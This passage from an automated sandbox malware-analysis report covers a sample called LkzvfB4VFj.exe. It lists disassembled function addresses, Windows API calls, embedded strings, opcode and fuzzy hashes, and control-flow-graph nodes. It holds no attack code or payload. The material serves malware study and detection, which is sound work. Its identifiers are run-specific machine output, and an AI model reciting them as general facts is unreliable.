                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-3355392842
                                                  • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                  • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                  • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                  • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                  Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LkzvfB4VFj.exe,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405ADC
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LkzvfB4VFj.exe,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405AEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3370423016
                                                  • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                  • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                  • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                  • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                  Function 6FEB10E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB115B
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB11B4
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB11C7
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB11F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: cee62eb4b56c4698e21a80fb01db18aeb2f4dc04b2cd8dceccc9685e1752fd56
                                                  • Instruction ID: 1a3c97de6119e2018845895a73920603566526ef521f8f92a34a9b3d5c3ad3de
                                                  • Opcode Fuzzy Hash: cee62eb4b56c4698e21a80fb01db18aeb2f4dc04b2cd8dceccc9685e1752fd56
                                                  • Instruction Fuzzy Hash: BE318DB1409645AFEB018FE8DB49A667FEAFB47274F24411FE854C6250D738A8118B21
                                                  Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                  • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                  • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                  • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                  • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

                                                  Execution Graph

                                                  Execution Coverage:0%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:1
                                                  Total number of Limit Nodes:0
                                                  execution_graph 87468 35fd2b90 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 35FD34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 35fd34e0-35fd34ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: c711c8cace224ed4a3aa67513b4d51176ef84e1f12bda2cf69a45e4b4849e70c
                                                  • Instruction ID: 8ea2745a434a3ea970072350147dc946489e0819d44c17c230186e52da7cc86b
                                                  • Opcode Fuzzy Hash: c711c8cace224ed4a3aa67513b4d51176ef84e1f12bda2cf69a45e4b4849e70c
                                                  • Instruction Fuzzy Hash: CE90023560510403D50072584614707101547D0201FA1CC56A4414528DC7A58A5575E2
                                                  Function 35FD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2 35fd2d10-35fd2d1c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b11c4f954ff9fb5a89ce579578685883c35a846e8237ad894d141ed9f45b33ef
                                                  • Instruction ID: 64981077291def1646ce40a37b4b201a2c456d71110566e1d5227d7fe290c1f4
                                                  • Opcode Fuzzy Hash: b11c4f954ff9fb5a89ce579578685883c35a846e8237ad894d141ed9f45b33ef
                                                  • Instruction Fuzzy Hash: A290023520100413D51172584604707001947D0241FD1CC57A4414518DD6668A56B161
                                                  Function 35FD2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 35fd2eb0-35fd2ebc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 79b852001e29fd1860edc2bd8a110dd0b72c135b62a4bfc0285f6ea7daa66a45
                                                  • Instruction ID: 3d2f12c0ee08aa24dcaec791ac94f83ef84b2eb1eec0d42cc6222554dfab14a7
                                                  • Opcode Fuzzy Hash: 79b852001e29fd1860edc2bd8a110dd0b72c135b62a4bfc0285f6ea7daa66a45
                                                  • Instruction Fuzzy Hash: 5C90043530140403D500735C4D1470F001547D0303FD1CC57F5154515DC735CD5575F1
                                                  Function 35FD2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1 35fd2bc0-35fd2bcc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0ee173b464ef11bc09878611e92046dbac90783b914ec7ee95507b9aa12aa809
                                                  • Instruction ID: 0757c83451b8b5beb15d25b405a00448af600e9475b1c1db2c9e29fdb217a7c6
                                                  • Opcode Fuzzy Hash: 0ee173b464ef11bc09878611e92046dbac90783b914ec7ee95507b9aa12aa809
                                                  • Instruction Fuzzy Hash: EF90023520100403D50076985508647001547E0301F91D856A9014515EC67589957171
                                                  Function 35FD2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 35fd2b90-35fd2b9c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1740f24abb573f4d7b10c372959f9f85632d7c6c78314f89d9cb025b4d2764da
                                                  • Instruction ID: de5534d7da97bba410b2c70bb39bcae1adc7314e004de91911aaaaec619f2933
                                                  • Opcode Fuzzy Hash: 1740f24abb573f4d7b10c372959f9f85632d7c6c78314f89d9cb025b4d2764da
                                                  • Instruction Fuzzy Hash: 5D90023520108803D5107258850474B001547D0301F95CC56A8414618DC6A589957161

                                                  Non-executed Functions

                                                  Function 36011FC9 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 0-2160512332
                                                  • Opcode ID: c2fa337094e560e296e3f70449d969591a9231ba2fd6697c807475873922d07e
                                                  • Instruction ID: 831112d94865e8ccfe4054682d3fd9b45e89e674f4363c73bb084101b0bc1527
                                                  • Opcode Fuzzy Hash: c2fa337094e560e296e3f70449d969591a9231ba2fd6697c807475873922d07e
                                                  • Instruction Fuzzy Hash: 4E928BB9A04341AFE321CF25C882B5BBBE8BB84754F504D6DFA94D7250D770D884CB9A
                                                  Function 36039060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 613 36039060-360390a9 614 360390ab-360390b0 613->614 615 360390f8-36039107 613->615 616 360390b4-360390ba 614->616 615->616 617 36039109-3603910e 615->617 619 360390c0-360390e4 call 35fd8f40 616->619 620 36039215-3603923d call 35fd8f40 616->620 618 36039893-360398a7 call 35fd4b50 617->618 629 36039113-360391b4 GetPEB call 3603d7e5 619->629 630 360390e6-360390f3 call 360592ab 619->630 627 3603923f-3603925a call 360398aa 620->627 628 3603925c-36039292 620->628 633 36039294-36039296 627->633 628->633 640 360391d2-360391e7 629->640 641 360391b6-360391c4 629->641 639 360391fd-36039210 RtlDebugPrintTimes 630->639 633->618 637 3603929c-360392b1 RtlDebugPrintTimes 633->637 637->618 647 360392b7-360392be 637->647 639->618 640->639 643 360391e9-360391ee 640->643 641->640 642 360391c6-360391cb 641->642 642->640 645 360391f3-360391f6 643->645 646 360391f0 643->646 645->639 646->645 647->618 649 360392c4-360392df 647->649 650 360392e3-360392f4 call 3603a388 649->650 653 36039891 650->653 654 360392fa-360392fc 650->654 653->618 654->618 655 36039302-36039309 654->655 656 3603930f-36039314 655->656 657 3603947c-36039482 655->657 658 36039316-3603931c 656->658 659 3603933c 656->659 660 36039488-360394b7 call 35fd8f40 657->660 661 3603961c-36039622 657->661 658->659 662 3603931e-36039332 658->662 663 36039340-36039391 call 35fd8f40 RtlDebugPrintTimes 659->663 678 360394f0-36039505 660->678 679 360394b9-360394c4 660->679 665 36039674-36039679 661->665 666 36039624-3603962d 661->666 669 36039334-36039336 662->669 670 36039338-3603933a 662->670 663->618 705 36039397-3603939b 663->705 667 36039728-36039731 665->667 668 3603967f-36039687 665->668 666->650 673 36039633-3603966f call 35fd8f40 666->673 667->650 677 36039737-3603973a 667->677 674 36039693-360396bd call 36038093 668->674 675 36039689-3603968d 668->675 669->663 670->663 690 36039869 673->690 702 360396c3-3603971e call 35fd8f40 RtlDebugPrintTimes 674->702 703 36039888-3603988c 674->703 675->667 675->674 684 36039740-3603978a 677->684 685 360397fd-36039834 call 35fd8f40 677->685 681 36039511-36039518 678->681 682 36039507-36039509 678->682 686 360394c6-360394cd 679->686 687 360394cf-360394ee 679->687 693 3603953d-3603953f 681->693 691 3603950b-3603950d 682->691 692 3603950f 682->692 697 36039791-3603979e 684->697 698 3603978c 684->698 715 36039836 685->715 716 3603983b-36039842 685->716 686->687 689 36039559-36039576 RtlDebugPrintTimes 687->689 689->618 719 3603957c-3603959f call 35fd8f40 689->719 699 3603986d 690->699 691->681 692->681 706 36039541-36039557 693->706 707 3603951a-36039524 693->707 700 360397a0-360397a3 697->700 701 360397aa-360397ad 697->701 698->697 709 36039871-36039886 RtlDebugPrintTimes 699->709 700->701 710 360397b9-360397fb 701->710 711 360397af-360397b2 701->711 702->618 745 36039724 702->745 703->650 717 360393eb-36039400 705->717 718 3603939d-360393a5 705->718 706->689 712 36039526 707->712 713 3603952d 707->713 709->618 709->703 710->709 711->710 712->706 721 36039528-3603952b 712->721 723 3603952f-36039531 713->723 715->716 724 36039844-3603984b 716->724 725 3603984d 716->725 720 36039406-36039414 717->720 726 360393d2-360393e9 718->726 727 360393a7-360393d0 call 36038093 718->727 742 360395a1-360395bb 719->742 743 360395bd-360395d8 719->743 729 36039418-3603946f call 35fd8f40 RtlDebugPrintTimes 720->729 721->723 731 36039533-36039535 723->731 732 3603953b 723->732 733 36039851-36039857 724->733 725->733 726->720 727->729 729->618 749 36039475-36039477 729->749 731->732 738 36039537-36039539 731->738 732->693 739 36039859-3603985c 733->739 740 3603985e-36039864 733->740 738->693 739->690 740->699 746 36039866 740->746 747 360395dd-3603960b RtlDebugPrintTimes 742->747 743->747 745->667 746->690 747->618 751 36039611-36039617 747->751 749->703 751->677
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $ $0
                                                  • API String ID: 3446177414-3352262554
                                                  • Opcode ID: 55f19525272704298500b318c643bfd91997833a610636b6a06a99f7c98ffe31
                                                  • Instruction ID: c2328c96c4b6b592d54036dbba6f533b13f2c1ab89a21728e1a9d00b9ddeabd3
                                                  • Opcode Fuzzy Hash: 55f19525272704298500b318c643bfd91997833a610636b6a06a99f7c98ffe31
                                                  • Instruction Fuzzy Hash: E03223B1A093818FE310CF69C885B5BBBE5BBC8345F10496EF5D987250E7B5D848CB52
                                                  Function 3603FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 940 3603fdf4-3603fe16 call 35fe7be4 943 3603fe35-3603fe4d call 35f87662 940->943 944 3603fe18-3603fe30 RtlDebugPrintTimes 940->944 949 3603fe53-3603fe69 943->949 950 36040277 943->950 948 360402d1-360402e0 944->948 952 3603fe70-3603fe72 949->952 953 3603fe6b-3603fe6e 949->953 951 3604027a-360402ce call 360402e6 950->951 951->948 955 3603fe73-3603fe8a 952->955 953->955 957 3603fe90-3603fe93 955->957 958 36040231-3604023a GetPEB 955->958 957->958 962 3603fe99-3603fea2 957->962 960 3604023c-36040257 GetPEB call 35f8b910 958->960 961 36040259-3604025e call 35f8b910 958->961 970 36040263-36040274 call 35f8b910 960->970 961->970 963 3603fea4-3603febb call 35f9fed0 962->963 964 3603febe-3603fed1 call 36040835 962->964 963->964 974 3603fed3-3603feda 964->974 975 3603fedc-3603fef0 call 35f8753f 964->975 970->950 974->975 979 3603fef6-3603ff02 GetPEB 975->979 980 36040122-36040127 975->980 981 3603ff70-3603ff7b 979->981 982 3603ff04-3603ff07 979->982 980->951 983 3604012d-36040139 GetPEB 980->983 984 3603ff81-3603ff88 981->984 985 36040068-3604007a call 35fa2710 981->985 986 3603ff26-3603ff2b call 35f8b910 982->986 987 3603ff09-3603ff24 GetPEB call 35f8b910 982->987 988 360401a7-360401b2 983->988 989 3604013b-3604013e 983->989 984->985 992 3603ff8e-3603ff97 984->992 1008 36040110-3604011d call 36040d24 call 36040835 985->1008 1009 36040080-36040087 985->1009 998 3603ff30-3603ff51 call 35f8b910 GetPEB 986->998 987->998 988->951 993 360401b8-360401c3 988->993 995 36040140-3604015b GetPEB call 35f8b910 989->995 996 3604015d-36040162 call 35f8b910 989->996 1001 3603ff99-3603ffa9 992->1001 1002 3603ffb8-3603ffbc 992->1002 993->951 1003 360401c9-360401d4 993->1003 1007 36040167-3604017b call 35f8b910 995->1007 996->1007 998->985 1027 3603ff57-3603ff6b 998->1027 1001->1002 1010 3603ffab-3603ffb5 call 3604d646 1001->1010 1012 3603ffce-3603ffd4 1002->1012 1013 3603ffbe-3603ffcc call 35fc3ae9 1002->1013 1003->951 1011 360401da-360401e3 GetPEB 1003->1011 1038 3604017e-36040188 GetPEB 1007->1038 1008->980 1017 36040092-3604009a 1009->1017 1018 36040089-36040090 1009->1018 1010->1002 1021 360401e5-36040200 GetPEB call 35f8b910 1011->1021 1022 36040202-36040207 call 35f8b910 1011->1022 1014 3603ffd7-3603ffe0 1012->1014 1013->1014 1025 3603fff2-3603fff5 1014->1025 1026 3603ffe2-3603fff0 1014->1026 1029 3604009c-360400ac 1017->1029 1030 360400b8-360400bc 1017->1030 1018->1017 1035 3604020c-3604022c call 3603823a call 35f8b910 1021->1035 1022->1035 1036 36040065 1025->1036 1037 3603fff7-3603fffe 1025->1037 1026->1025 1027->985 1029->1030 1039 360400ae-360400b3 call 3604d646 1029->1039 1041 360400ec-360400f2 1030->1041 1042 360400be-360400d1 call 35fc3ae9 1030->1042 1035->1038 1036->985 1037->1036 1045 36040000-3604000b 1037->1045 1038->951 1047 3604018e-360401a2 1038->1047 1039->1030 1046 360400f5-360400fc 1041->1046 1054 360400e3 1042->1054 1055 360400d3-360400e1 call 35fbfdb9 1042->1055 1045->1036 1051 3604000d-36040016 GetPEB 1045->1051 1046->1008 1052 360400fe-3604010e 1046->1052 1047->951 1057 36040035-3604003a call 35f8b910 1051->1057 1058 36040018-36040033 GetPEB call 35f8b910 1051->1058 1052->1008 1060 360400e6-360400ea 1054->1060 1055->1060 1066 3604003f-3604005d call 3603823a call 35f8b910 1057->1066 1058->1066 1060->1046 1066->1036
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                  • API String ID: 3446177414-1700792311
                                                  • Opcode ID: 36f0e63cb122126a7eb4c380d28a53dc615f5732ba90a6e4544b10d170f49685
                                                  • Instruction ID: ec333785bc4743a0682097979adecd04c8f6bfce10d1a74cb94da1dd0d493ff3
                                                  • Opcode Fuzzy Hash: 36f0e63cb122126a7eb4c380d28a53dc615f5732ba90a6e4544b10d170f49685
                                                  • Instruction Fuzzy Hash: B2D11039A00645DFDB12EFA4C542AADBFF2FF09704F4488E9E855AB261C7359941CF50
                                                  Function 3603F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: e482ff1ebbcaffd6ae0f001960fb6790aec811a59aef645c0cdcc0f79eec6d84
                                                  • Instruction ID: b0071f3519b1dc8c6fa2ffb921e58f1a2177d2dbab17e5341cead253bc799cbe
                                                  • Opcode Fuzzy Hash: e482ff1ebbcaffd6ae0f001960fb6790aec811a59aef645c0cdcc0f79eec6d84
                                                  • Instruction Fuzzy Hash: 3E914379A02784DFDB01CFA9C442AADBFF2FF49314F2488D9E454AB261CB369941CB11
                                                  Function 35F8D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                  • API String ID: 0-3532704233
                                                  • Opcode ID: 510d291c5590aa7c5fdd266263fab21efe8f0117dc9154427c4697ff861a7587
